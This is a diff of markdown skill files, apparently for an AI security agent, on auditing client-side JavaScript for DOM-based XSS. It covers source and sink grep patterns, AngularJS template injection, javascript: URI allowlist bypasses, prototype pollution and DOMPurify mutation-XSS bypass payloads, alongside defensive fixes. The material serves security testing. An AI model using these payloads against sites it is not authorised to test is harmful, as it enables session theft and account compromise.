-### 7. Test Front-End Frameworks
-
-Client-side template injection (CSTI) occurs when frameworks interpret user input as template expressions:
-
-* **AngularJS (v1.x):** Attributes like `ng-init` and interpolation `{{constructor.constructor('alert(1)')()}}` execute arbitrary code when within an element that has `ng-app` or `data-ng-app`. Injection is also possible via `data-ng-init` and class-based syntax such as `class="ng-init:constructor.constructor('alert(1)')()"`. Newer Angular versions (v2+) are not vulnerable in this way.
-* **Vue.js:** Within a Vue instance, payloads like `{{this.constructor.constructor('alert(1)')()}}` may execute. Vue also allows event handlers via attributes like `v-on` or `@click`.
-* **htmx:** Attributes such as `hx-on="error:alert(1)"` or malformed attribute names (`hx-trigger="x[1)}),alert(2)//]"`) can break into evaluation.
-
-When reviewing code using a framework, search for places where user input is inserted directly into templates or directive attributes without proper escaping. Test injecting `{{7*7}}` or other harmless expressions to see if the result is evaluated.
-
-### 8. Perform Dynamic Testing
-
-1. **Inject markers:** Modify the URL (query string, hash) or other sources with a unique token (e.g. `XSS_TEST`) and observe whether it appears in the DOM. Use DevTools search (Ctrl+F) to locate the token.
-2. **Trigger events:** If the code uses the hash, load the page normally and then modify `window.location.hash` via JavaScript or by changing the URL.
-3. **Set breakpoints:** Use DevTools to set breakpoints at points where sources are read or sinks are called. Step through the code to inspect variable values.
-4. **Try payloads:** Replace the marker with payloads appropriate for the sink. For HTML sinks, `<img src=x onerror=alert(1)>` is a universal payload. For location assignments, use `javascript:alert(1)`. For eval or setTimeout, use plain `alert(1)` or craft arrays with properties as described above.
-5. **Observe browser differences:** Some browsers encode `location.search` and `location.hash` automatically. Test in multiple browsers if a payload fails.
-
-## Sources and Sinks Reference
-
-| Category | Examples |
-|----------|----------|
-| **Sources** | `location.search`, `location.hash`, `location.pathname`, `document.referrer`, `document.cookie`, `window.name`, `event.data` in message handlers |
-| **HTML sinks** | `.innerHTML`, `.outerHTML`, `.insertAdjacentHTML()`, `document.write()`, `document.open()/write()/close()`, jQuery's `.html()`, `.append()`, `.attr()` when setting src or href |
-| **Execution sinks** | `eval()`, `Function()`, `setTimeout()/setInterval()` with string input, assignment of `javascript:` URLs to location or `<a href>` attributes |
-| **DOM manipulations** | Creating `<script>` elements with dynamic src, using `document.createElement('iframe')` with user-controlled src, adding dynamic `<link>` or `<style>` elements |
-| **Framework sinks** | AngularJS `ng-init`, `ng-app` expressions; Vue `v-bind`, `v-on` directives; htmx `hx-on`, `hx-trigger` |
-
-## High-Signal Patterns to Watch For
-
-During code review, prioritise code segments matching these patterns:
-
-1. Assignments like `element.innerHTML = userInput` or `document.write(userInput)`. Ask where `userInput` originates.
-2. Creation of `<script>` tags where the src is derived from user data or a `data-` attribute (`window.CONFIG_SRC.dataset.url`).
-3. Safe-URL checks comparing `new URL(url, location).origin` to `location.origin` without verifying the scheme and host.
-4. Use of `match()` or `test()` on user strings with regexes lacking a `^` anchor. Example: `/([a-zA-Z0-9]+|\s)+$/`.
-5. Calls to `postMessage(message, '*')` and handlers lacking strict `e.origin` checks or using `window.origin`.
-6. Handlers executing dynamic functions (`window[data.func](data)`, `callbacks[category][name](data)`), or calling `eval(e.data)`.
-7. Use of `window.<id>` variables (DOM clobbering) or global variables not explicitly declared.
-8. Framework attributes binding user input directly into template expressions (`{{...}}`, `ng-init`, `v-html`).
-
-## Defensive Recommendations
-
-Advise developers and testers to adopt the following defences:
-
-* **Encode and escape outputs:** Use appropriate context-sensitive encoding functions (HTML encode, attribute encode, JavaScript encode) before inserting data into the DOM.
-* **Use Trusted Types:** Enforce Trusted Types to prevent assignment of unsafe strings to DOM sinks.
-* **Validate URLs strictly:** Parse user URLs once, require explicit schemes (`http://`, `https://`), and check both host and scheme against an allow-list. Reject ambiguous formats like `https:example.com`.
-* **Anchor regex filters:** Use `^` and `$` in patterns and avoid using alternations that can be bypassed by prepending malicious data.
-* **Sanitise message data:** Use structured formats like JSON for messages, and always validate `e.origin`. Never trust `window.origin` or treat `'null'` as trusted.
-* **Avoid global element IDs:** When referencing elements, use `document.getElementById()` or scoped variables instead of relying on the global window object.
-* **Limit dynamic script loading:** Avoid injecting scripts based on untrusted data. If dynamic loading is necessary, apply a strict allow-list of accepted paths or hosts.
-* **Keep sanitizers up to date:** Libraries like DOMPurify should be regularly updated, and you should test for known bypasses (mutation XSS) when filtering user input.
-
-## Examples
-
-**Example 1: Audit URL parameter handling**
+# Search for postMessage handlers without origin checks
+grep -rn "addEventListener.*message" --include="*.js" src/
 ```
-User: "Review this JavaScript file for XSS vulnerabilities"
-→ Search for location.search, location.hash usage
-→ Trace data flow to innerHTML, document.write, or eval sinks
-→ Identify missing sanitization and report findings
+If grep finds no sinks, check for dynamically loaded scripts (lazy imports, `document.createElement('script')`) and framework render methods that bypass static grep.
+
+### 2. Trace data flow
+For each sink found, trace backwards: does attacker-controlled input reach it?
+- Direct: `element.innerHTML = location.hash.slice(1)`
+- Via variable: `const data = getParam('q'); ... el.innerHTML = data`
+- Via storage: `localStorage.setItem('x', userInput); ... el.innerHTML = localStorage.getItem('x')`
+
+### 3. Check sanitization
+If sanitization exists, verify it's adequate:
+- DOMPurify → check version, config (is `ALLOW_UNKNOWN_PROTOCOLS` set?)
+- Custom sanitizer → see `custom-sanitizer-audit` skill
+- Framework auto-escaping → verify not bypassed by `v-html`, `dangerouslySetInnerHTML`, `[innerHTML]`
+If sanitization status is ambiguous, attempt bypass patterns from step 6 before marking safe.
+
+### 4. Audit postMessage handlers
+```javascript
+// VULNERABLE — no origin check
+window.addEventListener('message', (e) => {
+  document.getElementById('output').innerHTML = e.data.html;
+});
+
+// SAFE — origin validated
+window.addEventListener('message', (e) => {
+  if (e.origin !== 'https://trusted.com') return;
+  // ... process e.data
+});
 ```
 
-**Example 2: Test postMessage handler security**
-```
-User: "Check if this postMessage handler is secure"
-→ Verify e.origin validation uses strict equality
-→ Check for window.origin usage (vulnerable)
-→ Test with null origin from sandboxed iframe
-→ Report bypasses and recommend fixes
-```
+### 5. Test CSTI (Client-Side Template Injection)
+- **AngularJS**: Any user input bound to Angular scope and rendered via `ng-bind-html` or `{{ }}` interpolation enables CSTI. If URL params, hash, or form values flow into scope variables that Angular evaluates, inject `{{constructor.constructor('alert(1)')()}}` as the sandbox escape payload. Check: does `$scope.variable = userInput` exist where `variable` appears in an `ng-bind-html` or `{{ variable }}` template? If yes, it is exploitable. The key insight: AngularJS evaluates template expressions in the scope context, so `searchQuery` from `?q=` reaching `{{searchQuery}}` or `ng-bind-html="searchQuery"` is code execution.
+- **Vue.js**: `v-html` directive bypasses Vue's auto-escaping. If user-controlled data (from API, URL, or form) reaches a `v-html` binding, it renders raw HTML. Safe: `{{ variable }}` (auto-escaped). Dangerous: `v-html="variable"`. Check both paths explicitly.
+- **htmx**: `hx-get`, `hx-post`, `hx-vals` with user-controlled URLs or values. If URL params populate `hx-get` targets, attacker controls which endpoint htmx fetches from.
 
-**Example 3: Analyze client-side template injection**
-```
-User: "This AngularJS app accepts user input in the URL"
-→ Test for ng-init or {{}} injection points
-→ Try payload: {{constructor.constructor('alert(1)')()}}
-→ Verify if template expressions execute
-→ Document CSTI vulnerability and context
-```
+### 6. Check browser quirks and library gadgets
+- **DOM clobbering**: `<form id="x"><input name="action" value="javascript:alert(1)">` — overwrites `document.x.action`
+- **Mutation XSS**: HTML that passes sanitizer but mutates in browser DOM — see `dompurify-mxss-bypass` skill
+- **Prototype pollution**: `__proto__` in URL params or JSON reaching `Object.assign`/spread — e.g. `?__proto__[isAdmin]=true` pollutes `Object.prototype` globally when merged via `Object.assign({}, defaults, urlParams)`
+- **jQuery .text() entity re-decoding**: `DOMPurify.sanitize(val)` → jQuery `$('<div>'+clean+'</div>').text()` → `innerHTML` = XSS. `.text()` decodes HTML entities that DOMPurify passed through, producing raw tags that innerHTML executes. Also applies to `.val()` and `.textContent` reads.
+- **moment.js format injection**: If user input controls `moment().format(input)` and output hits innerHTML, square brackets emit content verbatim: `moment().format("[<img src=x onerror=alert(1)>]")`
+- **javascript: URI parsing**: `new URL("javascript://host:443/path%0aalert(1)")` populates `.hostname`, `.port`, `.pathname` — passes allowlist checks. After `javascript:` scheme is stripped, `//` starts a JS single-line comment; `%0a` newline ends it and trailing code executes. Payload: `javascript://ALLOWED_HOST:443/%0aalert(document.domain)`
 
-## References
+### 7. Verify exploitability
+Build a PoC proving attacker-controlled input triggers the sink:
+```
+https://target.com/page#<img src=x onerror=alert(document.domain)>
+```
+Confirm: payload executes, not just reflected. Check CSP — if blocked, see `csp-bypass` skill.
 
-* [PortSwigger Web Security Academy – DOM-based XSS](https://portswigger.net/web-security/cross-site-scripting/dom-based)
-* [Practical CTF: Cross-Site Scripting and postMessage Exploitation](https://google.com)
-* Youssef Sammouda – DOM XSS write-ups
-* [Client-Side Security](https://book.jorianwoltjer.com/web/client-side)
-* [XSS Deep Dive](https://book.jorianwoltjer.com/web/client-side/cross-site-scripting-xss)
-* [WebSockets Security](https://book.jorianwoltjer.com/web/client-side/websockets)
+## Chain With
+- `csp-bypass` (CSP blocks execution), `dompurify-mxss-bypass` (DOMPurify present), `dom-vulnerability-static-analysis` (grep-based pre-screening), `aem-sling-exploitation` (AEM-specific XSS gadgets)

--- a/capabilities/web-security/skills/dom-vulnerability-static-analysis/GADGETS.md
+++ b/capabilities/web-security/skills/dom-vulnerability-static-analysis/GADGETS.md
@@ -1,0 +1,42 @@
+# Library-Specific XSS Gadgets
+
+Patterns where library behavior creates exploitable sinks even when input appears sanitized.
+
+## jQuery .text() entity re-decoding
+
+DOMPurify.sanitize() → `$('<div>'+clean+'</div>').text()` → innerHTML chain. jQuery's `.text()` decodes HTML entities, re-introducing dangerous characters after sanitization.
+
+```bash
+grep -rn '\.text()\|\.val()\|\.textContent' --include="*.js" src/ | grep -i 'innerHTML\|outerHTML\|\.html('
+```
+
+## moment.js format injection
+
+Square brackets in format strings produce literal output: `moment().format(userInput)` → innerHTML. Attacker supplies `[<img src=x onerror=alert(1)>]` as format string.
+
+```bash
+grep -rn 'moment.*format\|\.format(' --include="*.js" src/
+```
+
+## javascript: URI hostname bypass
+
+URL validators that parse with `new URL()` and check `.hostname` or `.protocol` are bypassable with `javascript:` URIs. The `//` after `javascript:` is parsed as a JS single-line comment. A URL-encoded newline (`%0a`) ends the comment, and trailing code executes.
+
+**Mechanism**: `javascript://cdn.example.com:443/%0aalert(document.domain)`
+- `new URL(...)` parses this with `.hostname = "cdn.example.com"` and `.protocol = "javascript:"`
+- Validators that allowlist hostnames but forget to block `javascript:` scheme pass this URL
+- When assigned to `location.href`, `window.open()`, or `<a href>`, the browser treats `//cdn.example.com:443/` as a JS comment (single-line), `%0a` starts a new line, and `alert(document.domain)` executes
+
+**Payload**: `javascript://cdn.example.com:443/%0aalert(document.domain)` (replace `cdn.example.com` with allowed hostname)
+
+```bash
+grep -rn 'new URL(' --include="*.js" src/ | grep -i 'hostname\|origin\|host\|protocol'
+```
+
+## Prototype pollution via Object.assign / spread
+
+`Object.assign({}, defaults, userInput)` or `{...defaults, ...userInput}` where `userInput` comes from URL params or JSON body. Attacker sends `__proto__[isAdmin]=true` or `constructor.prototype.isAdmin=true` to pollute `Object.prototype` globally.
+
+```bash
+grep -rn 'Object\.assign\|Object\.merge\|\.\.\.' --include="*.js" src/ | grep -i 'param\|query\|input\|config\|settings\|options'
+```

--- a/capabilities/web-security/skills/dom-vulnerability-static-analysis/SKILL.md
+++ b/capabilities/web-security/skills/dom-vulnerability-static-analysis/SKILL.md
@@ -1,225 +1,99 @@
 ---
 name: dom-vulnerability-static-analysis
-description: Static code analysis for DOM-based vulnerabilities in client-side JavaScript. USE WHEN performing pre-commit reviews, auditing large codebases without dynamic execution, triaging minified code for XSS issues, verifying sanitization routines, analyzing source-to-sink data flows, OR reviewing JavaScript files for potential DOM XSS. Covers source identification, data flow tracing, sink detection, sanitization assessment, postMessage handler review, framework-specific constructs, and automated pattern scanning with AST-based tools.
+description: Static code analysis for DOM-based vulnerabilities in client-side JavaScript — source/sink enumeration via grep and AST tools, data flow tracing, sanitization assessment, and framework-specific sink detection. Use when performing pre-commit reviews, auditing large codebases without dynamic execution, or triaging minified code for XSS issues.
 ---
 
-# DomVulnerabilityStaticAnalysis
+Static analysis framework for DOM XSS — no dynamic execution needed.
 
-Static code analysis framework for identifying DOM-based vulnerabilities in client-side JavaScript without dynamic execution.
+## 1. Enumerate sources and sinks
 
-## Overview
+```bash
+# Find all dangerous sinks
+grep -rn 'innerHTML\|outerHTML\|document\.write\|insertAdjacentHTML\|\.html(' \
+  --include="*.js" --include="*.jsx" --include="*.ts" --include="*.tsx" src/
 
-DOM-based vulnerabilities occur when untrusted data flows from a source to a sink entirely on the client. Static analysis involves examining the source code to identify these flows without executing the page. According to Intigriti's guide, hunting DOM-based XSS via static code analysis requires manually reviewing JavaScript files, searching for DOM sources, and tracing references forward through the code. Mozilla's research stresses that to avoid DOM XSS bugs we need to inspect patterns where a string is parsed into HTML, such as assignments to innerHTML or outerHTML, calls to insertAdjacentHTML(), and document.write().
+# Find eval-family sinks
+grep -rn 'eval(\|new Function(\|setTimeout([^,]*["\x27]\|setInterval([^,]*["\x27]' \
+  --include="*.js" --include="*.ts" src/
 
-## When to Use This Skill
+# Find URL assignment sinks
+grep -rn 'location\.\(href\|assign\|replace\)\s*=\|window\.open(' \
+  --include="*.js" --include="*.ts" src/
 
-Activate this skill when:
+# Find attacker-controlled sources
+grep -rn 'location\.\(hash\|search\|href\)\|document\.URL\|document\.referrer\|window\.name\|postMessage' \
+  --include="*.js" --include="*.ts" src/
 
-* You must audit JavaScript for DOM-based vulnerabilities but cannot run the code in a browser (e.g., during pre-commit reviews or reviewing minified code)
-* You need to triage large codebases for potential XSS issues and create high-signal leads for further manual inspection
-* You want to verify whether existing sanitisation routines correctly protect assignments to DOM sinks
-* You are performing automated security scanning at scale
-* You need to analyze minified or obfuscated JavaScript files
+# Framework-specific sinks
+grep -rn 'dangerouslySetInnerHTML\|v-html\|ng-bind-html\|\[innerHTML\]\|hx-get\|hx-post' \
+  --include="*.js" --include="*.tsx" --include="*.html" --include="*.vue" src/
 
-## Static Analysis Methodology
+# AngularJS CSTI: user input bound to scope then evaluated in {{ }} templates
+# Payload: {{constructor.constructor('alert(1)')()}} (sandbox escape for AngularJS 1.x)
+grep -rn 'ng-app\|ng-bind\|\$scope\.\|ng-model\|ng-bind-html' \
+  --include="*.html" --include="*.js" src/
 
-The static analysis process can be broken down into the following steps. Be systematic and record all findings for follow-up testing.
-
-### 1. Identify Attacker-Controlled Sources
-
-Begin by listing all the JavaScript constructs that can carry user input:
-
-* **URL components:** `window.location`, `location.search`, `location.hash`, `location.pathname`, and related properties
-* **Document referrer:** `document.referrer`
-* **Cookies and storage:** `document.cookie`, `localStorage`, `sessionStorage`
-* **Window name:** `window.name`
-* **Post messages:** `event.data` in message handlers
-* **Third-party inputs:** Data returned from APIs, query parameters passed into functions, and imported JSON or YAML files
-
-Search across the codebase for these properties. Use a case-sensitive search (grep, ripgrep, or your IDE's find-in-files) to build a list of occurrences. For minified or obfuscated files, consider using a beautifier to improve readability.
-
-### 2. Trace Data Flow to Sinks
-
-Once you locate a source, trace how the data moves through variables. Follow assignments, function arguments, and returns to determine where the value is eventually used. It may help to annotate the code with comments or to draw a simple flow diagram. Keep in mind that static analysis cannot determine the run-time value of a variable; treat any variable assigned from a source as untrusted until proven otherwise.
-
-### 3. Locate Dangerous Sinks
-
-Identify places where untrusted data is inserted into the DOM or executed as code. Key patterns to look for include:
-
-| Sink Category | Examples |
-|---------------|----------|
-| **HTML injection** | Assignments to `.innerHTML` and `.outerHTML`, calls to `insertAdjacentHTML()`, `document.write()` and `document.writeln()`, jQuery's `.html()` and `.append()` methods |
-| **Code execution** | `eval()`, `Function()`, `setTimeout()/setInterval()` when called with a string, or constructing `<script>` elements with dynamic src attributes |
-| **URL redirection** | Assignments to `location`, `location.href`, `location.assign()`, `window.open()` and setting src/href attributes on `<a>`, `<iframe>`, `<img>`, etc. |
-| **Template evaluation** | Framework-specific directives such as AngularJS `ng-init`, Vue `v-bind`/`v-on`, or htmx `hx-on` that interpolate expressions |
-
-Write down each instance where data flows from an untrusted variable into one of these sinks. If the right side of an assignment is a literal string, it is usually safe. Otherwise, proceed to the next step.
-
-### 4. Assess Sanitisation and Validation
-
-Review any filtering or sanitisation logic applied to the data before it reaches a sink. Ask these questions:
-
-* **Is a sanitizer used?** Functions like `DOMPurify.purify()` are recognised as safe in tooling like Mozilla's ESLint plugin. If the code calls a known sanitizer (e.g., `DOMPurify.sanitize()`, `escapeHTML()`), it is likely safe.
-* **Are regex patterns robust?** Filters must anchor both the beginning and end of the string. Patterns such as `/([a-zA-Z0-9]+|\s)+$/` allow attackers to prepend malicious content. Ensure the pattern uses `^` and `$` to bound the entire string.
-* **Do URL validators parse correctly?** Functions that call `new URL()` may misparse schemes if the input is malformed. Reject ambiguous formats like `https:example.com` and validate both protocol and host.
-* **Are types enforced?** Static analysis cannot inspect run-time types, so treat any input that is not explicitly converted or validated as a potentially dangerous string. Arrays or objects may call custom `toString()` methods that return `javascript:` schemes. Confirm type checking is in place.
-
-Document any sanitisation functions encountered. Where the filter logic appears insufficient or absent, flag the instance for further review.
-
-**⚠️ Critical Warning:** If a function is called `escapeHTML` but it IS NOT a standard library function, you should review the function FIRST before flagging it as safe. A common pattern is developers naming their own validation functions which can often be bypassed.
-
-* If this is the case, examine the function and understand how it could be bypassed and deem it weak or insecure.
-
-### 5. Examine postMessage Handlers
-
-Cross-origin messaging is handled via `window.postMessage()`. When reviewing static code:
-
-1. **Locate handlers:** Search for `addEventListener('message', ...)` and assignments to `onmessage`.
-2. **Check origin validation:** Ensure the code compares `event.origin` to a trusted, exact origin rather than using `startsWith()` or `includes()`. Static analysis should flag comparisons to `window.origin` or cases where no origin check is performed. Accept only messages from known domains.
-3. **Validate message data:** Avoid executing functions based on `event.data`. Look for patterns like `window[data.func](data.payload)` and flag them. Data should be parsed (e.g., `JSON.parse()`) and validated against a strict schema before use.
-
-### 6. Review Framework-Specific Constructs
-
-Modern frameworks introduce their own templating and directive mechanisms. When reviewing code, search for:
-
-* **AngularJS:** Look for `ng-init`, `ng-app`, or double curly `{{...}}` interpolation. If user input is bound inside these expressions without sanitisation, it may trigger client-side template injection.
-* **Vue.js:** Look for `v-bind:`, `v-on:`, and mustache syntax. Binding untrusted data directly can lead to execution of functions such as `this.constructor.constructor('alert(1)')()`.
-* **htmx:** Check attributes like `hx-on`, `hx-trigger`, and `hx-target`. Malformed attribute names or values may break parsing rules and execute injected code.
-
-Flag any directive or binding where user data is inserted into template expressions or directive attributes.
-
-### 7. Perform En-Masse Pattern Scanning
-
-For large codebases, manual inspection is impractical. Use automated searches to highlight high-risk patterns:
-
-1. **Regex scanning:** Search for assignments to known sinks using regular expressions (e.g., `\.innerHTML\s*=`, `\.outerHTML\s*=`, `insertAdjacentHTML\(`, `document\.write\(`). Tools like ripgrep can search recursively and provide line numbers. Once this is done, it is vital to trace and understand context to understand if the flow is accessible, how it is accessible and what sources can reach it.
-
-2. **AST-based tools:** Consider using linting plugins or static analysis tools such as `eslint-plugin-no-unsanitized` (for JavaScript) which parse the Abstract Syntax Tree and differentiate between hardcoded literals and variables. These tools reduce false positives and highlight flows that require review.
-
-3. **Source-to-sink analysis:** If your tooling supports taint analysis, run it to automatically trace untrusted sources to sinks. Treat any flagged path as a high priority for manual verification.
-
-4. **Whitelisting safe patterns:** Maintain a list of approved sanitisation functions (e.g., `DOMPurify.purify`, `escapeHTML`) and configure your scanner to treat assignments wrapped in these functions as safe. Anything else should be flagged for human review. Remember, if a function is called `escapeHTML` but it IS NOT a standard library, you should review the function FIRST before flagging it as safe. A common pattern is developers naming their own functions to validate which can often be bypassed.
-   * If this is the case, examine the function and understand how it could be bypassed and deem it weak or insecure.
-
-Document the results in a spreadsheet or issue tracker. For each finding, record the file, line number, source variable, sink call, and any sanitiser observed. This helps prioritise follow-up audits.
-
-### 8. Flag and Communicate Findings
-
-Static analysis produces potential vulnerabilities, not definitive exploits. For each flagged instance:
-
-* **Describe the source–sink flow:** Indicate the untrusted input and the sink it reaches. Example: "queryParam → innerHTML without sanitisation."
-* **Assess sanitisation:** Note whether a recognised sanitiser is used or if a custom filter appears weak (e.g., regex missing anchors).
-* **Prioritise by risk:** Highlight sinks that lead to code execution (`eval`, `Function`) and critical flows like client-side redirects. Provide examples of potential payloads to illustrate impact.
-* **Recommend remediation:** Suggest encoding output, validating inputs, using frameworks' safe APIs (e.g., `textContent` instead of `innerHTML`), or introducing Trusted Types. Encourage developers to adopt automated linting to prevent regressions.
-
-## High-Signal Patterns for Static Review
-
-During static analysis, prioritise the following patterns as they often indicate vulnerabilities:
-
-1. Assignments to `.innerHTML`/`.outerHTML` with a variable rather than a literal string
-2. Calls to `document.write()`, `document.open().write()`, `append()` or `html()` where the argument is user-controlled
-3. Construction of `<script>`, `<iframe>`, or `<img>` elements with dynamic src/href attributes derived from user input
-4. Functions that build URLs by concatenating strings rather than using safe URL constructors, and then assign them to `location` or `window.open()`
-5. Regex validations that do not anchor the start and end of the string
-6. Origin checks in postMessage handlers that use `startsWith()` or compare to `window.origin` instead of explicit allowed origins
-7. Conditional logic that branches on untrusted data and calls dynamic execution functions like `eval()`, `Function()`, or `setTimeout()`
-8. Framework directives or template interpolations that embed variables without sanitisation
-
-## Automated Scanning Tools
-
-Consider using these tools to accelerate static analysis:
-
-* **eslint-plugin-no-unsanitized** - Mozilla's ESLint plugin that detects unsafe DOM manipulation
-* **Semgrep** - Pattern-based code scanner with DOM XSS rules
-* **CodeQL** - GitHub's semantic code analysis engine with JavaScript security queries
-* **ripgrep/grep** - For quick regex-based searches across codebases
-* **js-beautify** - For deobfuscating and formatting minified JavaScript before analysis
-
-## Analysis Workflow
-
-Follow this systematic workflow for large codebases:
-
-```
-1. Setup
-   ├─ Collect all JavaScript files
-   ├─ Deobfuscate/beautify minified code
-   └─ Set up linting tools (ESLint, Semgrep)
-
-2. Automated Scan
-   ├─ Run AST-based tools (eslint-plugin-no-unsanitized)
-   ├─ Run pattern matchers (Semgrep/CodeQL)
-   ├─ Search for source patterns (location.*, document.cookie, etc.)
-   └─ Search for sink patterns (.innerHTML, eval, etc.)
-
-3. Manual Triage
-   ├─ Review each flagged instance
-   ├─ Trace data flow from source to sink
-   ├─ Assess sanitization effectiveness
-   └─ Document findings with risk rating
-
-4. Reporting
-   ├─ Categorize by severity (Critical/High/Medium/Low)
-   ├─ Provide proof-of-concept payloads
-   ├─ Recommend specific remediation
-   └─ Track fixes and retest
+# Prototype pollution sources: Object.assign/spread with user-controlled input
+grep -rn 'Object\.assign\|\.\.\..*param\|\.\.\..*query\|merge(' \
+  --include="*.js" --include="*.ts" src/
 ```
 
-## Examples
+## 2. Trace data flow (source → sink)
 
-**Example 1: Scan codebase for innerHTML assignments**
-```
-User: "Find all potentially unsafe innerHTML assignments in this repository"
-→ Use ripgrep to search for \.innerHTML\s*= patterns
-→ Filter out assignments with literal strings
-→ Trace remaining assignments back to data sources
-→ Flag flows from location.*, document.referrer, or event.data
-→ Generate report with file paths, line numbers, and risk assessment
+For each sink hit, trace backwards to determine if attacker input reaches it:
+
+```bash
+# Find the variable assigned to the sink, then trace its origin
+# Example: el.innerHTML = content → where does `content` come from?
+grep -rn "content\s*=" --include="*.js" src/ | grep -i "location\|param\|query\|hash\|input\|request"
 ```
 
-**Example 2: Audit custom sanitization function**
-```
-User: "Review this escapeHTML function to see if it's secure"
-→ Read function implementation
-→ Check if it uses proper encoding (HTML entity encoding)
-→ Test against known bypass patterns (<img src=x onerror=alert(1)>)
-→ Verify it handles all contexts (attributes, text nodes, URLs)
-→ Report weaknesses and recommend using DOMPurify instead
-```
+Classify each finding:
+- **Direct flow**: source → sink with no sanitization = **vulnerability**
+- **Sanitized flow**: source → sanitizer → sink = check sanitizer adequacy
+- **Static content**: hardcoded string → sink = **not exploitable**
 
-**Example 3: Triage large JavaScript bundle**
-```
-User: "This 5MB minified bundle may have DOM XSS vulnerabilities"
-→ Beautify the bundle using js-beautify
-→ Run eslint-plugin-no-unsanitized across the formatted code
-→ Search for high-risk patterns (eval, Function, innerHTML assignments)
-→ Prioritize findings by examining source-to-sink flows
-→ Create ranked list of vulnerabilities for manual verification
+## 3. Assess sanitization
+
+```bash
+# Find DOMPurify usage
+grep -rn "DOMPurify\|dompurify\|sanitize(" --include="*.js" --include="*.ts" src/
+
+# Find custom sanitizers
+grep -rn "function.*sanitiz\|function.*escape\|function.*clean\|function.*filter" \
+  --include="*.js" --include="*.ts" src/
 ```
 
-**Example 4: Analyze postMessage handler security**
-```
-User: "Check if these postMessage handlers are secure"
-→ Search for addEventListener('message', ...) patterns
-→ Extract each handler function
-→ Verify presence of event.origin validation
-→ Check if validation uses strict equality (===) with whitelisted origins
-→ Look for dangerous patterns like window[event.data.func]()
-→ Document insecure handlers with exploitation scenarios
-```
+For custom sanitizers: apply the `custom-sanitizer-audit` skill (Five-Point Checklist).
+For DOMPurify: check version and config — see `dompurify-mxss-bypass` skill.
 
-## References
+## 4. AST-based analysis (optional)
 
-* [PortSwigger Web Security Academy – DOM-based XSS](https://portswigger.net/web-security/cross-site-scripting/dom-based)
-* [Intigriti – Hunting DOM XSS via Static Code Analysis](https://blog.intigriti.com)
-* [Mozilla – eslint-plugin-no-unsanitized](https://github.com/mozilla/eslint-plugin-no-unsanitized)
-* [Practical CTF: Cross-Site Scripting and postMessage Exploitation](https://google.com)
-* Youssef Sammouda – DOM XSS write-ups
-* [Client-Side Security](https://book.jorianwoltjer.com/web/client-side)
-* [XSS Deep Dive](https://book.jorianwoltjer.com/web/client-side/cross-site-scripting-xss)
-* [WebSockets Security](https://book.jorianwoltjer.com/web/client-side/websockets)
+For large codebases, use tooling:
+- **Semgrep**: `semgrep --config p/javascript` for DOM XSS rules
+- **CodeQL**: `javascript/ql/src/Security/CWE-079` for taint tracking
+- **ESLint**: `no-unsanitized/property`, `no-unsanitized/method`
 
----
+## 5. Cross-validate findings
 
-**License:** CC-BY-4.0
+Before reporting, reduce false positives by cross-referencing:
+- Compare grep-based sink hits (steps 1-2) against AST taint-tracking results (step 4) — a finding confirmed by both methods is high-confidence
+- For grep-only hits: manually verify the data flow in context (minified code aliasing can produce false matches)
+- For AST-only hits: confirm the sink pattern wasn't missed by grep regex limitations
+- Discard any finding where the source is provably non-attacker-controlled after contextual review
 
-This skill provides a comprehensive checklist for static analysis of client-side code. It complements dynamic testing by identifying flows worth exploring further when run-time analysis is possible.
+## 6. Report findings
+
+For each confirmed source-to-sink flow:
+- File, line number, sink type
+- Source of attacker input
+- Sanitization present (yes/no, adequate/inadequate)
+- Exploitability assessment
+- Recommended fix
+
+## 7. Library-specific XSS gadgets
+
+See `GADGETS.md` for jQuery `.text()` re-decoding, moment.js format injection, and `javascript:` URI hostname bypass patterns.
+
+## Chain With
+- `dom-vulnerability-detection` (dynamic analysis), `csp-bypass` (CSP blocks), `dompurify-mxss-bypass` (DOMPurify), `aem-sling-exploitation` (AEM-specific XSS gadgets)

--- a/capabilities/web-security/skills/dompurify-mxss-bypass/SKILL.md
+++ b/capabilities/web-security/skills/dompurify-mxss-bypass/SKILL.md
@@ -1,6 +1,6 @@
 ---
 name: dompurify-mxss-bypass
-description: Mutation XSS (mXSS) bypasses against DOMPurify HTML sanitizer. Use when DOMPurify.sanitize() detected in target JS source (CDN include or npm module).
+description: Crafts mutation XSS payloads, identifies namespace confusion vectors, and exploits parsing differentials in DOMPurify HTML sanitizer. Use when DOMPurify.sanitize() detected in target JS source (CDN include or npm module).
 ---
 
 # DOMPurify mXSS Bypass
@@ -10,6 +10,16 @@ description: Mutation XSS (mXSS) bypasses against DOMPurify HTML sanitizer. Use 
 - CDN includes: `cdn.jsdelivr.net/npm/dompurify` or `cdnjs.cloudflare.com/ajax/libs/dompurify`
 - Sanitized HTML inserted via `.innerHTML` or `.outerHTML`
 - Version <=3.1.2 (check JS global `DOMPurify.version`)
+
+## Workflow
+1. **Fingerprint version** — check `DOMPurify.version` in browser console or grep JS source for version string in CDN URL / bundled comment
+2. **Test namespace confusion** (<=3.1.2) — inject SVG/title payload, check if alert fires
+3. **If stripped, check DOM mutation** — inspect browser DevTools Elements panel for DOM structure changes after sanitization (mutation evidence without execution still confirms the vector)
+4. **Test node flattening** (<=3.1.2) — generate 506+ nested div payload, append SVG/style
+5. **Test DOM clobbering depth reset** (<=3.1.1) — 508+ nested forms with style payload
+6. **Grep for post-sanitization sinks** — search for `.text()` / `.val()` / `.textContent` output flowing into `.innerHTML` / `.html()` / `document.write()` downstream of DOMPurify
+7. **Test entity re-decoding** — if post-sanitization sink found, inject `&lt;img src=x onerror=alert(document.domain)&gt;`
+8. **Confirm execution** — if alert fires, capture version, payload, and DOM context as PoC evidence
 
 ## Probe
 **Namespace Confusion (<=3.1.2):**
@@ -24,15 +34,33 @@ description: Mutation XSS (mXSS) bypasses against DOMPurify HTML sanitizer. Use 
 ```html
 <form id="parentNode"><form>...[508 nested forms]...</form></form><style>alert(1)</style>
 ```
-Key: DOMPurify sanitizes the HTML **string** safely, but browser re-parsing into DOM causes **mutation** that creates executable context. Namespace boundary between HTML/SVG/MathML is the primary attack surface.
+## Post-Sanitization Bypass: jQuery .text() Entity Re-decoding
+
+Not an mXSS — a post-sanitization data flow bug where downstream code decodes DOMPurify's safe output back into dangerous HTML:
+
+```javascript
+// Vulnerable pattern:
+const clean = DOMPurify.sanitize(value);        // entities preserved (safe)
+const $el = $('<div>' + clean + '</div>');       // browser decodes entities into DOM text
+const text = $el.text();                          // .text() reads decoded content as raw string
+el.innerHTML = text;                              // re-parses raw string as HTML → XSS
+```
+
+**Payload:** `&lt;img src=x onerror=alert(document.domain)&gt;`
+
